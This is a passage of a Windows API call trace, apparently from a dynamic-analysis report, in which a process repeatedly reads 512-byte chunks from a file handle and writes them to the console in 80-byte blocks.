lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] GetFileType (hFile=0x4c) returned 0x1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, 
lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] GetFileType (hFile=0x4c) returned 0x1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] GetFileType (hFile=0x4c) returned 0x1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] GetFileType (hFile=0x4c) returned 0x1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] GetFileType (hFile=0x4c) returned 0x1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] GetFileType (hFile=0x4c) returned 0x1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: 
lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.097] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.097] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.097] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.097] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] GetFileType (hFile=0x4c) returned 0x1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] GetFileType (hFile=0x4c) returned 0x1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] GetFileType (hFile=0x4c) returned 0x1 [0107.097] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.097] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] GetFileType (hFile=0x4c) returned 0x1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] GetFileType (hFile=0x4c) returned 0x1 [0107.098] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0107.098] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] GetFileType (hFile=0x4c) returned 0x1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] GetFileType (hFile=0x4c) returned 0x1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] GetFileType (hFile=0x4c) returned 0x1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.098] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.098] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.098] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.098] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] 
GetFileType (hFile=0x4c) returned 0x1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] GetFileType (hFile=0x4c) returned 0x1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] GetFileType (hFile=0x4c) returned 0x1 [0107.098] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.098] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] GetFileType (hFile=0x4c) returned 0x1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] GetFileType (hFile=0x4c) returned 0x1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] GetFileType (hFile=0x4c) returned 0x1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 
[0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] GetFileType (hFile=0x4c) returned 0x1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] GetFileType (hFile=0x4c) returned 0x1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.099] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.099] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.099] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.099] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] GetFileType (hFile=0x4c) returned 0x1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] GetFileType (hFile=0x4c) returned 0x1 [0107.099] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.099] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] GetFileType (hFile=0x4c) returned 0x1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] GetFileType (hFile=0x4c) returned 0x1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] GetFileType (hFile=0x4c) returned 0x1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] GetFileType (hFile=0x4c) returned 0x1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] GetFileType (hFile=0x4c) returned 0x1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] GetFileType (hFile=0x4c) returned 0x1 [0107.100] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.100] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.100] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.100] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.101] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.101] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] GetFileType (hFile=0x4c) returned 0x1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] GetFileType (hFile=0x4c) returned 0x1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] GetFileType (hFile=0x4c) returned 0x1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] GetFileType (hFile=0x4c) returned 0x1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] GetFileType 
(hFile=0x4c) returned 0x1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] GetFileType (hFile=0x4c) returned 0x1 [0107.101] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.101] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.102] GetFileType (hFile=0x4c) returned 0x1 [0107.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.102] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.102] GetFileType (hFile=0x4c) returned 0x1 [0107.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.102] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.102] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.102] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.102] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.102] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.102] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0107.102] GetFileType (hFile=0x4c) returned 0x1 [0107.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.102] GetFileType (hFile=0x4c) returned 0x1 [0107.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.102] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.102] GetFileType (hFile=0x4c) returned 0x1 [0107.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.102] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.102] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.102] GetFileType (hFile=0x4c) returned 0x1 [0107.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.103] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.103] GetFileType (hFile=0x4c) returned 0x1 [0107.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.103] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.103] GetFileType (hFile=0x4c) returned 0x1 [0107.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.103] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, 
lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.103] GetFileType (hFile=0x4c) returned 0x1 [0107.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.103] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.103] GetFileType (hFile=0x4c) returned 0x1 [0107.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.103] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.103] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.103] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.103] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.103] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.103] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.103] GetFileType (hFile=0x4c) returned 0x1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] GetFileType (hFile=0x4c) returned 0x1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] GetFileType (hFile=0x4c) returned 0x1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0107.104] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] GetFileType (hFile=0x4c) returned 0x1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] GetFileType (hFile=0x4c) returned 0x1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] GetFileType (hFile=0x4c) returned 0x1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] GetFileType (hFile=0x4c) returned 0x1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.104] GetFileType (hFile=0x4c) returned 0x1 [0107.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.105] WriteFile (in: hFile=0x4c, 
lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.105] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.105] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.105] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.105] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.105] GetFileType (hFile=0x4c) returned 0x1 [0107.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.105] GetFileType (hFile=0x4c) returned 0x1 [0107.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.105] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.105] GetFileType (hFile=0x4c) returned 0x1 [0107.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.105] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.105] GetFileType (hFile=0x4c) returned 0x1 [0107.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.105] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.105] _get_osfhandle 
